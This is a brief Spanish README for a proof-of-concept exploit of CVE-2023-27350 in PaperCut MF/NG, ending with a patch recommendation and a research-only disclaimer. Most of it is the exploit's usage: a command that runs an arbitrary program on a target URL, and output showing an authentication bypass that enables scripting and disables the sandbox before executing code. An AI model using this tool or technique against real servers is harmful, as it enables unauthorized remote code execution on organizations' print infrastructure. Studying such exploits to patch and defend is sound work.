
Vulnerabilidad de Papercut, las versiones afectadas son PaperCut MF o NG versión 8.0 o posterior (excluyendo versiones parcheadas) en todas las plataformas de sistema operativo.
POC para CVE-2023-27350 que afecta a PaperCut MF/NG
##Versiones afectadas 'PaperCut MF o NG versión 8.0 o posterior (excluyendo versiones parcheadas) en todas las plataformas OS.'
Este POC utiliza una vulnerabilidad de omisión de autenticación encadenada con el abuso de la funcionalidad de scripting incorporada para ejecutar código.
python3 CVE-2023-27350.py --url 'http://10.0.40.56:9191' --command calc.exe
[*] Papercut instance is vulnerable! Obtained valid JSESSIONID
[*] Updating print-and-device.script.enabled to Y
[*] Updating print.script.sandboxed to N
[*] Prepparing to execute...
[+] Executed successfully!
[*] Updating print-and-device.script.enabled to N
[*] Updating print.script.sandboxed to Y
Actualice a la última versión o mitigue siguiendo las instrucciones del Aviso de Seguridad de PaperCut
Este software ha sido creado puramente con fines de investigación académica y para el desarrollo de técnicas defensivas efectivas, y no está destinado a ser utilizado para atacar sistemas excepto cuando esté explícitamente autorizado. Los mantenedores del proyecto no son responsables ni se hacen responsables del mal uso del software. Úselo de manera responsable.